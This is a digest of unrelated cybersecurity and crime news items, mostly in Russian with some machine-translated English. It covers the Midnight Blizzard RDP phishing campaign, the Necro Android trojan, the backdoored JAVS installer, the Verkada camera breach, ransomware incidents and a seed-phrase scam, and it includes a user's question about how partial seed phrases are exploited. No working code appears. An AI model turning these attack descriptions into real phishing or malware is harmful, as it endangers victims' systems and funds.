22 октября 2024 года компания Microsoft обнаружила кампанию фишинга, в ходе которой Midnight Blizzard разослала фишинговые письма тысячам пользователей в более чем 100 организациях. Данная рассылка была крайне таргетированной, в ней использовались приманки, замаскированные под Microsoft, Amazon Web Services (AWS), с концепцией Zero Trust. В письмах содержался файл конфигурации протокола удаленного рабочего стола (RDP), подписанный сертификатом LetsEncrypt. Файлы конфигурации RDP (.RDP) содержат автоматические настройки, которые устанавливаются при успешном подключении к серверу RDP. Эти конфигурации распространяют функции и ресурсы локальной системы на удаленный сервер, контролируемый агентом.
В этой кампании вредоносное вложение .RDP содержало несколько конфиденциальных настроек, которые могли привести к значительному раскрытию информации. После того как целевая система была скомпрометирована, она подключалась к серверу, контролируемому агентом, и двунаправленно передавала ресурсы локального устройства целевого пользователя на сервер. Ресурсы, отправленные на сервер, могут включать, в частности, все логические жесткие диски, содержимое буфера обмена, принтеры, подключенные периферийные устройства, аудио (в том числе микрофон), а также функции и средства аутентификации операционной системы Windows, включая смарт-карты. Такой доступ может позволить субъекту угрозы установить вредоносное ПО на локальные диски и подключенные сетевые ресурсы, в частности в папки автозапуска, или установить дополнительные инструменты, такие как трояны удаленного доступа (RAT), для сохранения доступа после закрытия сеанса RDP. Процесс установления RDP-соединения с системой, контролируемой агентом, может также раскрыть учетные данные пользователя, вошедшего в целевую систему.
[Источник](https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight- blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/)
Троян Necro заразил 11 млн устройств под управлением Android — он обнаружился в модификациях популярных приложений и даже в магазине Google Play, где были выявлены два заражённых Necro приложения, сообщили в «Лаборатории Касперского».
Вредонос Necro внедряется в приложения через заражённые SDK для разработки ПО. Он встречается в модифицированных версиях популярных приложений, в том числе Spotify, WhatsApp и Minecraft. Будучи запущенным, троян заражает системы другими вредоносами: рекламным софтом, мошенническим ПО и инструментами, которые позволяют использовать мобильные устройства качестве прокси-серверов при осуществлении других атак.
В магазине Google Play заражёнными Necro оказались приложения Wuta Camera и Max Browser. У Wuta Camera насчитываются более 10 млн установок; троян содержала версия 6.3.2.148, а в более свежих версиях он уже удалён. Но даже после удаления трояна на устройствах пострадавших пользователей может оставаться полезная нагрузка — установленные с его помощью вредоносные приложения. Wuta Camera и Max Browser были заражены через набор рекламных инструментов Coral SDK.
Поскольку большинство заражённых Necro приложений являются взломанными или модифицированными, рекомендуется пользоваться ПО только из официальных источников. Хотя всегда остаётся вероятность, что небезопасны и они, если вспомнить размещённое в Google Play приложение Wuta Camera, поэтому рекомендуется устанавливать на гаджеты и антивирусное ПО.
устройств ](https://3dnews.ru/1111453/troyan-necro-probralsya-v-google-play-i- zarazil-11-millionov-androidustroystv)
Троян Necro заразил 11 млн устройств под управлением Android — он обнаружился в модификациях популярных приложений и даже в магазине Google Play, где были выявлены два заражённых Necro приложения, сообщили в «Лаборатории Касперского».
3dnews.ru
В Турции криптоинвестор покончил с собой в тире после того, как геополитические события и его собственные финансовые потери привели к резкому падению цен на криптовалюту. Об этом сообщает телеграм-канал«Прямой эфир».
Доктор из Диярбакыра страдал от депрессии, и крах криптовалютного рынка стал для него последним ударом. Он пришел в тир, получил оружие и выстрелил себе в голову.
[ https://perm.tsargrad.tv/news/vturcii-doktor-pokonchil-ssoboj-iz-za-obvala- kriptovaljuty_987774?utm_source=yxnews&utm_medium=desktop ](https://perm.tsargrad.tv/news/vturcii-doktor-pokonchil-ssoboj-iz-za-obvala- kriptovaljuty_987774?utm_source=yxnews&utm_medium=desktop)
В Ульяновске приключилась история, достойная фильмов Гая Ричи. Шестеро криптовалютчиков похитили 23-летнего студента и в течение трёх дней вымогали у него украденные деньги, применяя насилие. Такова версия следствия. Адвокат же одного из задержанных считает, что похищения не было: когда в квартиру ворвались оперативники, они не застали потерпевшего привязанным к стулу со следами от утюга — он спокойно сидел на диване и листал ленту в соцсетях.
В арендуемом офисе на проспекте Ленинского Комсомола, 50 работали десять парней: от 18 до 26 лет. Они делали деньги на так называемом криптотрейдинге: покупали и продавали криптовалюту (разновидность цифровой валюты, — прим.), зарабатывая на колебании цен. Ребята постепенно расширялись и нанимали новых людей. Так в офис и пришёл 23-летний студент одного из ульяновских вузов Стас Петров (имя изменено - ред.).
По словам Руслана Зартдинова, адвоката одного из задержанных, Стас стал работать с ними, а через некоторое время после его трудоустройства другой участник виртуального бизнеса заметил пропажу банковской карты. Заглянув в «Мобильный банк» он схватился за голову — со счёта пропало 740 тысяч рублей.
После разбирательств выяснили, что карточку взял новенький. Прижатый к стенке студент начал рассказывать, что снимал деньги на нужды семьи. Якобы его мать тяжело болеет, нужны средства на лечение. Как утверждают задержанные, позже они узнали, что парень — заядлый игроман, и «просадил» крупную сумму на ставках.
По версии следствия, молодые люди предъявили студенту не украденные деньги с карточки, а хищение криптовалюты на ту же сумму. Они якобы под угрозой применения насилия посадили Петрова в автомобиль «Тойота Прада» (на заднее сиденье в середину, чтобы не мог выбраться) и отвезли в офис, где удерживали три дня, избивая и требуя возместить ущерб. Молодой человек «шёл в отказ» и ничего не отдавал.
Как следует из показания парней, они пытались договориться, чтобы возместить ущерб. Петров вернул 80 тысяч рублей, а остальные деньги должен был взять в кредит, который ему нигде не дали, так как он и без того был в долгах.
Зартдинов уверен, никто никого не похищал: «Утверждается, что парня
удерживали, незаконно ограничили его свободу. Но как тогда объяснить, что он
ходил за алкоголем и продуктами в магазин, выходил из офиса покурить, гулял по
офису? Всё это зафиксировано камерами видеонаблюдения».
Адвокат сообщил, что после кражи карточки ребята позвонили маме и папе
студента. Петровы сказали, что сын «игровой» и его нельзя выпускать — иначе
тот просадит что-нибудь ещё. Зартдинов утверждает, что это доказывается
диктофонными записями — все разговоры подозреваемые зафиксировали.
Адвокат назвал ещё один аргумент в пользу непохищения: по словам обвиняемых, папа у Стаса - влиятельный сотрудник прокуратуры, поэтому парни, зная это, вряд ли бы стали его похищать.
Тем не менее, позже родители Петрова позвонили в полицию и сообщили, что сына незаконно лишили свободы.
В среду, 29 марта, в офис криптовалютчиков ворвались оперативники. Полицейские и следователи областного СКР при силовой поддержке бойцов СОБР Управления Росгвардии региона задержали ребят.
Как сообщил Зартдинов, в момент появления правоохранителей Смирнов спокойно сидел на диване и листал соцсети: «У парня при себе был смартфон, свободный доступ в интернет. Он мог в любой момент сообщить в полицию, но почему-то этого не сделал».
В следственном управлении информацию уточнять отказались: «Допрос задержанных и другие следственные действия, направленные на установление обстоятельств произошедшего, продолжаются, поэтому утверждать, что конкретно произошло, пока рано».
В данный момент задержанные находятся в изоляторе временного содержания. Возбуждено уголовное дело по статьям 126 (п.п. «а», «в» и «з» ч. 2) и 163 (п.п. «а», «в» и «г» ч. 2) УК РФ — фигурантам вменяют похищение и вымогательство.
source: 73online.ru/r/rokovoy_igroman_novichok- kriptovalyutchik_obvoroval_firmu_a_potom_reshil_posadit_vseh-118208
Black Basta решили не скрываться и выложили все карты на стол, добавив
компанию в свой список жертв.
Доказательством того, что за атакой на Maple Leaf Foods стоит именно Black
Basta, стала запись на сайте злоумышленников. Вымогатели сохраняли интригу
несколько недель, пока компания вела расследование и разбиралась со сбоями,
вызванных киберинцидентом.
Стоит отметить, что хакерам не удалось полностью остановить работу крупнейшего
производителя мяса в Канаде – Maple Leaf Foods смогла восстановить часть
нужных систем и продолжить работу с клиентами и поставщиками, тем самым
минимизировав последствия кибератаки.

Однако злоумышленники все же смогли вытащить часть данных из систем компании.
Подтверждением этого стал пост на сайте Black Basta, к которому хакеры
прикрепили несколько конфиденциальных документов Maple Leaf Foods. Эксперты
предполагают, что часть украденной информации была получена из сетей фабрик
производителя мясных продуктов и других объектов, контролируемых компанией.
Maple Leaf Foods – крупнейший канадский производитель готовых блюд из мяса и
птицы, который имеет 21 производственное предприятие и 14 000 сотрудников. В
2021 году объем продаж компании составил 3,3 миллиарда долларов.
Hackers gained access to live surveillance cameras installed at Tesla, Equinox, healthcare clinics, jails, and banks, including the Bank of Utah.
In addition to images captured from the cameras, the hacker also shared
screenshots of their ability to gain root shell access to the surveillance
systems used by Cloudflare and at Telsa HQ.
According to Tillie Kottmann, a reverse engineer for the group of hackers,
they gained access to these surveillance systems using a super admin account
for Verkada, a surveillance company who works with all of these organizations.
Speaking to BleepingComputer, Kottmann said they found hardcoded credentials for a Verkada super admin account in exposed DevOps infrastructure.
Verkada makes enterprise security systems such as automation and IoT surveillance cameras. The company is also known to provide services to Tesla.
This afternoon Kottmann teased by posting multiple images allegedly captured
from surveillance cameras at Equinox, Tesla, and the Bank of Utah.
In the same Twitter thread, Kottmann shared images of what appeared to be root
access to a Linux operating system. From these images, you can see the MAC
address of one of the network cards, which [corresponds to
equipment](https://hwaddress.com/mac-address-
range/E0-A7-00-00-00-00/E0-A7-00-FF-FF-FF/) developed by surveillance company
Verkada.
The hacker
demonstrating having obtained shell access to Cloudflare and Tesla systems
After Bloomberg News, who first reported on this attack, contacted Verkada,
the hackers lost access to the hacked super admin account.
"We have disabled all internal administrator accounts to prevent any unauthorized access," a Verkada representative told Bloomberg. "Our internal security team and external security firm are investigating the scale and scope of this potential issue."
The hashtag #OperationPanopticon associated with this cyberattack refers to Panopticon, a philosophical design concept.
Panopticon refers to a design of such a building in which captives (e.g., prisoners) cannot tell whether they are being watched by security personnel or not at a given moment.This means, in a building with a large number of inmates, it may be impossible for one guard to monitor all of the inmates at the same time, yet because of the panopticon design ideology, every prisoner may fear being watched for they have no way of knowing if they are being watched.
Он позволит разработчикам более безопасно использовать опенсорсные пакеты
«Лаборатория Касперского» представила новый фид — Kaspersky Open Source Software Threats Data Feed. Это первый подобный сервис в России, он позволит выявлять закладки в сторонних компонентах и ПО с открытым исходным кодом. С этим сервисом компании смогут минимизировать риски использования Open Source — благодаря актуальным данным о пакетах с уязвимостями, вредоносным кодом и недекларированными возможностями.
На данный момент в Kaspersky Open Source Software Threats Data Feed уже содержится информация примерно о трёх тысячах уязвимых и вредоносных пакетов, размещённых в популярных репозиториях. Причём в десятках пакетов были зафиксированы недекларированные возможности, в том числе отображение нежелательной информации политической направленности. Некоторые из скомпрометированных компонентов были загружены пользователями десятки тысяч раз. По данным «Лаборатории Касперского», среди уязвимостей, обнаруженных в Open Source пакетах, около 35% имеют высокий уровень опасности (High) и около 10% — критический (Critical).
Разработчики часто используют готовые пакеты с открытым исходным кодом при выполнении своих задач. Это позволяет им фокусироваться на комплексных проектах и индивидуальных требованиях к ПО, экономить время и ресурсы при создании стандартных функций. Существует несколько крупных репозиториев, где специалисты могут найти подходящий под свой проект компонент. Однако в подобных пакетах могут содержаться случайные или намеренные уязвимости, а также вредоносный код. Более того, иногда создатели пакета намеренно приводят исполняемый код программы к виду, сохраняющему её функциональность, но затрудняющему анализ, понимание алгоритмов работы и внесение изменений при декомпиляции.
С потоком данных Kaspersky Open Source Software Threats Data Feed разработчики смогут избежать уязвимых и скомпрометированных пакетов. Это в том числе пакеты, которые содержат политические лозунги либо изменяют свою функциональность в определённых регионах (например, блокируют функциональность в РФ). Фид предоставляется в формате JSON.
«Использование готовых пакетов при разработке — это общепринятая практика. Она позволяет экономить много времени при создании ПО. Однако важно помнить о возникающих рисках атак на цепочку поставок, которые особенно возросли в 2022 году, когда были обнаружены сотни скомпрометированных и вредоносных пакетов в популярных репозиториях. Чтобы снизить риски подключения уязвимых или даже вредоносных пакетов, мы предлагаем проверять их сторонние компоненты с помощью нашего решения», — комментирует Денис Паринов, эксперт по кибербезопасности «Лаборатории Касперского».
source: kaspersky.ru/about/press-releases/2022_laboratoriya-kasperskogo- predstavila-pervyj-v-rossii-servis-dlya-vyyavleniya-zakladok-v-po-s-otkrytym- ishodnym-kodom
Задержан мужчина, незаконно получавший доступ к чужим видеокамерам. Такую информацию разместила в Telegram-канале официальный представитель МВД Ольга Чемоданова.
На 47-летнего жителя Борисова вышли оперативники по противодействию киберпреступности местного РУВД. С помощью специализированных компьютерных программ мужчина получал доступ к веб-камерам и камерам видеонаблюдения.
"По оперативной информации, хакер занимался противоправной деятельностью около семи лет, незаконно "заглядывая" в дома, квартиры, офисы, фитнес-центры и салоны-красоты. Только за последние два года милиционеры выявили более 140 преступных фактов, совершенных в отношении белорусов. По месту жительства фигуранта изъято 6 внешних жестких дисков, общим объемом памяти свыше 11 терабайт, на которых обнаружены видеоматериалы и графические изображения интимной жизни потерпевших", - рассказали в МВД.
Следователи дали правовую оценку действиям задержанного и возбудили уголовное дело за использование либо распространение вредоносных программ.
The new self-appointed military government of Myanmar has temporarily banned Facebook.
The local arm of multinational mobile carrier Telenor said it has received an order from the nation’s Ministry of Transport and Communications and has enacted it “while expressing grave concerns regarding breach of human rights.”
Newswire Reuters ’ Myanmar reporter Hnin Zaw posted a notice from Myanmar’s Ministry of Transport and Communications that imposed a ban until February 7th.
Using optical character recognition and online translation tools, The Register surmises that the order says the ban is needed to stop the spread of fake news.
Censorship-watching organisation NetBlocks says it has detected the effects of the ban.
Facebook has reportedly put Myanmar on a watchlist, in order to detect and delete content urging violence.
The Social Network™ is very widely used in Myanmar so the ban will stop the spread of all news and make it hard for citizens to communicate.
Locals may already be routing around the block: the trending domains report on Cloudflare’s internet radar also shows surging traffic to TikTok and the VK.com messaging service.
Два африканца-организатора преступной схемы, которая принесла мошенникам около $1 млн, приговорены к 4 годам и 1 году лишения свободы соответственно. Мошеннические схемы действовали с декабря 2011 года по январь 2017 года
По данным ESET, до своего заключения киберпреступники использовали различные мошеннические методы, в том числе компрометацию деловой электронной почты (BEC-атака), мошенничество с работой на дому, обналичивание чеков и мошенничество с кредитными картами.
Мошенники использовали фишинговые атаки в качестве своего основного оружия, чтобы получить доступ к корпоративным учетным записям электронной почты и обманом заставить людей и компании отправлять им деньги. Злоумышленники также использовали слабые пароли для доступа к учетным записям своих целей.
Получив доступ к учетным записям жертв, банда отправляла электронные письма компаниям, ведущим бизнес с жертвой, с просьбой о выплатах на новые банковские счета, находящиеся под ее контролем. Киберпреступники составляли персонализированные электронные письма, которые было трудно отличить от мошеннических.
ESET также подчеркнула, как мошенники использовали мошенничество с работой на дому, маскируясь под работодателей. Мошенничество с работой на дому требовало, чтобы группа выдавала себя за работодателей на сайтах вакансий, используя поддельные псевдонимы.
Затем мошенники нанимали людей на кажущуюся законной работу, которая на самом деле была прикрытием для мошеннической деятельности, включая создание банковских и платежных счетов, перевод или снятие денег со счетов, а также обналичивание или депонирование поддельных чеков.
Киберпреступники также использовали схему «романтического мошенничества» (romance scam). Завоевав доверие жертв, мошенники использовали их в качестве денежных мулов для перевода денег за границу и получения наличных с мошеннических банковских переводов.
source: welivesecurity.com/2023/05/30/tricks-trade-cybercrime-ring-fraud- scheme
Министерство юстиции США объявило о завершении транснационального расследования в отношении рынка киберпреступлений в даркнете xDedic, предъявив 19 подозреваемым обвинения в причастности к управлению и использованию услуг рынка.
Международная операция с участием правоохранительных органов США, Бельгии, Украины, Германии и Нидерландов при поддержке Европола и Евроюста привела к конфискации доменов и инфраструктуры xDedic в январе 2019 года
. разоблачение того, что мошеннические действия, осуществленные через рынок киберпреступности xDedic, составили более 68 миллионов долларов.
До закрытия администраторы xDedic управляли серверами по всему миру, используя платежи в криптовалюте, чтобы скрыть местоположение своих серверов и личности покупателей, продавцов и администраторов.
xDedic позволил пользователям покупать украденные учетные данные для взломанных серверов по всему миру, а также личную информацию жителей США (PII).
«В общей сложности xDedic выставила на продажу более 700 000 скомпрометированных серверов, в том числе не менее 150 000 в США и не менее 8 000 во Флориде», — заявили в Министерстве юстиции.
Жертвы, информация которых была продана на торговой площадке, были представителями различных отраслей и мест по всему миру, включая местные, государственные и федеральные государственные учреждения, больницы, университеты, столичные транспортные управления, бухгалтерские и юридические фирмы, а также пенсионные фонды.
Ведущий разработчик и администратор торговой площадки уже находятся в тюрьме.
12 из 19 подозреваемых, обвиненных в ходе международного расследования
деятельности xDedic, уже приговорены, пятеро должны получить приговор, а двое
ожидают экстрадиции из Соединенного Королевства.
Двое администраторов xDedic, молдаванин Александру Хабасеску и украинец Павел
Харманский, были приговорены к 41 и 30 месяцам тюремного заключения после
ареста на испанских Канарских островах в 2022 году и в международном аэропорту
Майами в 2019 году соответственно.
Хабасеску также был ведущим разработчиком и техническим вдохновителем рынка, а Харманский платил администраторам, обеспечивал поддержку покупателей и продвигал сайт, посвященный киберпреступности.
«Продавец торговой площадки Дарий Панков, гражданин России, был одним из самых продаваемых на торговой площадке по объему продаж, выставив на продажу учетные данные более 35 000 скомпрометированных серверов, расположенных по всему миру, и получив более 350 000 долларов незаконных доходов», — заявило Министерство юстиции США. добавлен.
«Гражданин Нигерии Аллен Левинсон был активным покупателем на Marketplace, который проявлял особый интерес к приобретению доступа к базирующимся в США фирмам, сертифицированным по публичному бухгалтерскому учету.
«Он использовал информацию, полученную с этих серверов, для подачи сотен фальшивых налоговых деклараций правительству Соединенных Штатов. ,
Левинсон был приговорен к 78 месяцам тюремного заключения после его задержания в Соединенном Королевстве и экстрадиции в Соединенные Штаты в 2020 году
. В прошлом году правоохранительные органы также захватили рынок украденных учетных данных Genesis и арестовали 288 продавцов и покупателей наркотиков в темной сети в рамках хакерской атаки. Международная правоохранительная операция под кодовым названием «Спектор».
В июне ФБР конфисковало хакерский форум BreachForums после ареста в марте его владельца Коннора Брайана Фицпатрика (он же Помпомпурин).
И последнее, но не менее важное: в декабре международная полицейская операция под руководством Интерпола привела к аресту 3500 киберпреступников и конфискации 300 миллионов долларов США, а немецкая полиция захватила Kingdom Market, торговую площадку в даркнете, которая торговала инструментами киберпреступности, наркотиками и поддельным правительством. идентификаторы.
@BleepingComputer
Офицеры подпольного полицейского участка арестованы за преследование противников КНР.
ФБР арестовало более 20 человек по подозрению в том, что они управляли подпольным полицейским участком в Нью-Йорке под руководством Китайской Народной Республики (КНР). Офицеров «секретной» полиции обвиняют в использовании поддельных аккаунтов для угроз, преследования и запугивания китайских диссидентов, проживающих в Америке.
Полицейский участок был обнаружен в районе Чайнатаун в Нью-Йорке и работал с февраля 2022 года. Изначально полиция арестовала двух мужчин из Нью-Йорка, предположительно работающих в секретном полицейском участке. Арестованные являлись агентами правительства Китая. Однако после того, как стало известно о начале расследования ФБР, агенты уничтожили все улики, подтверждающие их общение с китайскими чиновниками и раскрывающие масштабы операции.
Сообщается, что сотрудники китайского консульства посещали секретный участок через несколько недель после его основания. «Китайская Станция» в чайнатауне была создана под ложным предлогом помощи в предоставлении государственных услуг жителям этого района.
Apple announced a suite of security and privacy improvements on Wednesday that the company is pitching as a way to help people protect their data from hackers, including one that civil liberty and privacy advocates have long pushed for.
The tech giant will soon allow users to choose to secure more of the data backed up to their iCloud using end-to-end encryption, which means no one but the user will be able to access that information.
Source: [https://www.theguardian.com/technol...security-privacy-measures- spike-cyber-attacks](https://www.theguardian.com/technology/2022/dec/07/apple- new-security-privacy-measures-spike-cyber-attacks)
Мошенники, имитирующие Coinbase, украли $1,7 млн у пользователя
На прошлой неделе мошенники, выдававшие себя за сотрудников Coinbase, обманом
заставили одного из пользователей поделиться частью своей сид-фразы, что
привело к краже $1,7 млн из его кошелька.
" Мошенник позвонил жертве, представился службой безопасности Coinbase и
отправил фальшивое письмо, подтверждающее, что жертва общалась с официальным
представителем компании.
Затем жертва ввела часть своей сид-фразы на поддельном сайте, что позволило
мошенникам украсть средства.** "
Генеральный директор Hiro Systems Алекс Миллер отметил, что такие сайты могут
собирать данные по мере их ввода, и частичного раскрытия сид-фразы было
достаточно для взлома.
В первой половине 2024 года из-за фишинга и атак с компрометацией сид-фраз
было украдено более $900 млн.**
Вопрос от себя: Знатоки, поделитесь пожалуйста тем, как им это удалось? Как они заполучили доступ к кошельку имея на руках только лишь половину сид-фразы? И как компрометируют сид-фразы?
Last week, scammers posing as Coinbase employees tricked one of the users into
sharing part of his sidechrase, which led to the theft of $1.7 million from
his wallet.
" The fraudster called the victim, introduced himself to the Coinbase security
service and sent a fake email confirming that the victim had communicated with
an official representative of the company.
The victim then entered part of his seed phrase on a fake website, which
allowed the scammers to steal funds. "
Alex Miller, CEO of Hiro Systems, noted that such sites can collect data as
they are entered, and partial disclosure of the seed phrase was enough for
hacking.
In the first half of 2024, more than $900 million was stolen due to phishing
and attacks with compromising keywords.
A question from myself: Experts, please share how they did it? How did they
get access to the wallet with only half of the seed phrase in their hands? And
how are LED phrases compromised?
Злоумышленники [внедрили бэкдор](https://www.rapid7.com/blog/post/2024/05/23/cve-2024-4978-backdoored- justice-av-solutions-viewer-software-used-in-apparent-supply-chain-attack/) в инсталлятор широко распространенного софта для видеозаписи судебных заседаний Justice AV Solutions (JAVS), что позволяло им перехватывать контроль над взломанными системами.
Компания, стоящая за разработкой упомянутого ПО, утверждает, что в настоящее время JAVS установлен в 10 000 залов судебных заседаний, юридических контор, исправительных учреждений и правительственных организаций по всему миру.
JAVS удалила взломанную версию ПО своего официального сайта, заявив, что
троянское ПО, содержащее вредоносный бинарный файл fffmpeg.exe
, «не
принадлежало JAVS или какой-либо третьей стороне, связанной с JAVS».
Компания подчеркивает, что также провела полный аудит всех систем и сбросила
все пароли, чтобы в случае кражи они не могли использоваться в будущих атаках.
«Благодаря постоянному мониторингу и сотрудничеству с различными киберведомствами, мы обнаружили попытки заменить наше программное обеспечение Viewer 8.3.7 скомпрометированным файлом, — говорится в заявлении компании. — Мы убедились, что все доступные на данный момент файлы на сайте JAVS.com являются подлинными и не содержат вредоносных программ. Кроме того, мы удостоверились, что ни исходный код JAVS, ни сертификаты, ни системы, ни другие версии программного обеспечения не были скомпрометированы в результате этого инцидента».
Click to expand...
Специалисты ИБ-компании Rapid7 [провели расследование](https://www.rapid7.com/blog/post/2024/05/23/cve-2024-4978-backdoored- justice-av-solutions-viewer-software-used-in-apparent-supply-chain-attack/) случившегося и сообщают, что речь шла об атаке на цепочку поставок. Проблеме был присвоен идентификатор CVE-2024-4978, и впервые троянизированный инсталлятор JAVS был замечен еще в начале апреля, когда исследователи S2W Talon обнаружили в нем малварь Rustdoor/GateDoor.
Анализируя инцидент, связанный с CVE-2024-4978, произошедший 10 мая, аналитики Rapid7 выяснили, что после установки и запуска эта малварь отправляет системную информацию жертвы на свой управляющий сервер. Затем вредонос выполняет два обфусцированных скрипта PowerShell, которые пытаются отключить Event Tracing for Windows (ETW) и обойти Anti-Malware Scan Interface (AMSI).
В дальнейшем дополнительная полезная нагрузка, загружаемая с сервера
злоумышленников, доставляла в зараженную систему Python-скрипты, которые
начинали сбор учетных данных, хранящихся в браузерах.
По информации исследователей, в этом инциденте инсталлятор с бэкдором
(JAVS.Viewer8.Setup_8.3.7.250-1.exe) был загружен именно с официального сайта
JAVS.
На прошлой неделе компания предупредила всех клиентов JAVS о срочной необходимости обновить все эндпоинты, на которых был развернут троянский инсталлятор. Чтобы гарантировать, что злоумышленники лишились доступа, рекомендуется не только сбросить все учетные данные, используемые для входа на потенциально скомпрометированные эндпоинты, но также обновить JAVS Viewer до версии 8.3.9 или выше после полной переустановки системы.
«Простого удаления ПО недостаточно, поскольку злоумышленники могли внедрить дополнительные бэкдоры или вредоносное ПО. Только повторное развертывание образа системы обеспечивает чистую установку, — предупредили специалисты. — Полная переустановка затронутых эндпоинтов и сброс связанных с ними учетных данных очень важны, так как позволяют убедиться, что злоумышленники не воспользуются бэкдорами или украденными учетными данными».
Click to expand...
Основатель проекта Ordinal Rugs попался на фишинг, в результате чего злоумышленники вывели с его горячего кошелька 1,47 BTC (~$102 500) и биткоин-«надписи» на 4 BTC (~$278 000).
__https://twitter.com/x/status/1772723992698261893
«За мои десять лет в криптоиндустрии это первый раз, когда я потерял значительную сумму денег из-за взлома/мошенничества (не говоря уже о сливе кошелька)», — сообщил глава платформы под псевдонимом Archon.
Взлом начался с сообщения, отправленного членам Discord-сервера Bitcoin Rock с рекламой розыгрыша популярных ординалов Runestones. Ссылка в посте вела на фейковый сайт NFT-маркетплейса Magic Eden.
Когда Archon подключил свой кошелек к сайту и подписал транзакцию, хакер смог украсть его монеты и «надписи». Он признался, что был невнимательным, забыв о главных правилах безопасности.
«Затронутый кошелек предназначался только для выпуска [биткоин-NFT], но со временем я начал проявлять неосторожность и оставлял там больше порядковых номеров, а также средства для покупки и обмена», — отметил он.
По его словам, во время рассылки фишинга злоумышленники тегнули всех участников через команду @all, однако права на такое действия имели только администраторы сервера.
Archon обнаружил, что появился новый способ манипулировать пингами в канале, используя так называемый «поток уценки» (markdown flow). Он пришел к выводу, что даже крупные и хорошо защищенные серверы рискуют подвергнуться атаке.
«Это чрезвычайно болезненный урок. На самом деле нет ничего хуже, чем момент, когда вы понимаете, что ваш кошелек опустошен. Будьте бдительны, когда дело доходит до подключения к раздачам или минту токенов», — напомнил основатель Ordinal Rugs.
В конце Archon отметил, что кошельки самого проекта не были затронуты. Он также поблагодарил некоторых членов сообщества за выкуп двух украденных «надписей», которые ему впоследствии вернули.
Ранее аналитики Pocket Universe предупредили о глобальном криптофишинге на Discord. Они заявили, что преступники научились встраивать вредоносные ссылки напрямую в сообщения для маскировки.
На первый день конкурса Pwn2Own 2023 в Торонто, Канада, исследователи безопасности дважды взломали смартфон Samsung Galaxy S23. Они также продемонстрировали эксплойты и цепочки уязвимостей в смартфоне Xiaomi 13 Pro, а также в принтерах, умных колонках, устройствах сетевого хранилища (NAS) и камерах видеонаблюдения от Western Digital, QNAP, Synology, Canon, Lexmark и Sonos.
Компания Pentest Limited первой продемонстрировала нулевой день на флагманском устройстве Samsung Galaxy S23, использовав ошибку неправильной проверки ввода для выполнения кода, за что получила $50 000 и 5 баллов Master of Pwn.
Команда STAR Labs SG также проэксплуатировала список разрешенных входов для взлома Samsung Galaxy S23, заработав $25 000 (половину приза за второй раунд атаки на то же устройство) и 5 баллов Master of Pwn.
Организаторы объяснили, что, хотя только первая демонстрация в категории выигрывает полную денежную награду, каждая успешная работа требует полного количества очков Master of Pwn. Поскольку порядок попыток определяется случайным образом, участники, получившие более поздние слоты, все равно могут претендовать на титул Master of Pwn, даже если они зарабатывают меньший денежный выигрыш.
Согласно правилам конкурса [Pwn2Own Toronto 2023](https://www.zerodayinitiative.com/blog/2023/7/12/the-soho-smashup- returns-for-pwn2own-toronto-2023), на всех целевых устройствах работают последние версии операционной системы со всеми установленными обновлениями безопасности. В первый день конкурса выплачены призы на сумму $438 750 за 23 успешно продемонстрированные уязвимости нулевого дня.
Во время мероприятия Pwn2Own Toronto 2023, организованного Zero Day Initiative (ZDI) от Trend Micro, участники могли нацелиться на мобильные и IoT- устройства. Полный список включает смартфоны (например, Apple iPhone 14, Google Pixel 7, Samsung Galaxy S23 и Xiaomi 13 Pro), принтеры, беспроводные маршрутизаторы, устройства сетевого хранилища (NAS), системы домашней автоматизации, системы видеонаблюдения, умные колонки, а также устройства Google Pixel Watch и Chromecast, все в их стандартной конфигурации и с последними обновлениями безопасности.
Самые высокие награды предусмотрены за ошибки нулевого дня в категории мобильных телефонов: денежные призы в размере до $300 000 за взлом iPhone 14 и $250 000 за взлом Pixel 7, а общий фонд составляет более $1 000 000. Полное расписание Pwn2Own Toronto 2023 и результаты каждого испытания приведены на этой странице.
The John the Ripper tool, which is a popular password cracking tool used in Kali Linux. In this essay, we will explore what the John the Ripper tool is, how it works, and its significance in the field of cybersecurity.
John the Ripper is a password cracking tool that is used to find weak passwords in systems. It was originally created to crack Unix passwords, but it has since been extended to support a variety of different systems, including Windows, macOS, and various other operating systems. The tool is included as a part of the Kali Linux distribution, which is a popular operating system used by cybersecurity professionals.
The tool works by using a combination of dictionary attacks, brute-force attacks, and other techniques to guess passwords. It can be used to crack passwords stored in various formats, including the traditional Unix password hash format, Windows NTLM hash format, and others. John the Ripper can also be used to crack password-protected files, such as ZIP and RAR archives.
One of the significant advantages of John the Ripper is its flexibility and customizability. The tool can be configured to use different cracking modes, attack methods, and rules. This allows cybersecurity professionals to tailor their attacks to the specific systems and passwords they are trying to crack. Additionally, John the Ripper is a command-line tool, which makes it easy to integrate into scripts and automated processes.
Despite its power and versatility, John the Ripper does have some limitations. The tool is only as effective as the passwords it is trying to crack. If the passwords are strong, it may take an impractical amount of time to crack them. Additionally, the tool is designed to crack passwords in a legal and ethical manner, and its use for illegal purposes is prohibited.
In conclusion, John the Ripper is a powerful and versatile password cracking tool that is used by cybersecurity professionals to find weak passwords in systems. It is included as a part of the Kali Linux distribution and is a widely used tool in the field of cybersecurity. While the tool has some limitations, its customizability and flexibility make it an essential tool in the arsenal of any cybersecurity professional. However, it is important to use the tool in an ethical and legal manner and to respect the privacy and security of others.
American managed service provider CompuCom is expecting losses of over $20 million following this month's DarkSide ransomware attack that took down most of its systems.
CompuCom is an IT managed services provider (MSP) and a wholly-owned
subsidiary of The ODP Corporation (Office Depot/Office Max).
The MSP's workforce of over 8,000 employees provides hardware and software
repair, remote support, and other tech services to high-profile companies,
including Citibank, Home Depot, Wells Fargo, Target, Trust Bank, and Lowe's.
"The Company estimates the loss of revenue to be between $5.0 million and $8.0 million as a result of the incident (primarily because of CompuCom's need to temporarily suspend certain services to certain customers)," CompuCom's parent company, ODP Corporation, revealed [on Friday](https://www.businesswire.com/news/home/20210326005466/en/The-ODP- Corporation-Provides-Update-On-CompuCom%E2%80%99s-Malware-Incident-And- Business- Impact#:~:text=In%20addition%2C%20the%20Company%20expects%20to%20incur%20expenses%20of%20up%20to%20%2420%20million%2C%20of%20which%20the%20Company%20assumes%20approximately%20%2410%20million%20will%20be%20accrued%20through%20the%20first%20quarter%20of%202021).
"In addition, the Company expects to incur expenses of up to $20 million, of which the Company assumes approximately $10 million will be accrued through the first quarter of 2021."
The expenses are mainly related to the company's ongoing efforts to restore impacted systems and services, as well as "to address certain other matters resulting from the incident."
CompuCom also expects that a share of the expenses incurred after the ransomware attack will be covered by cyber insurance.
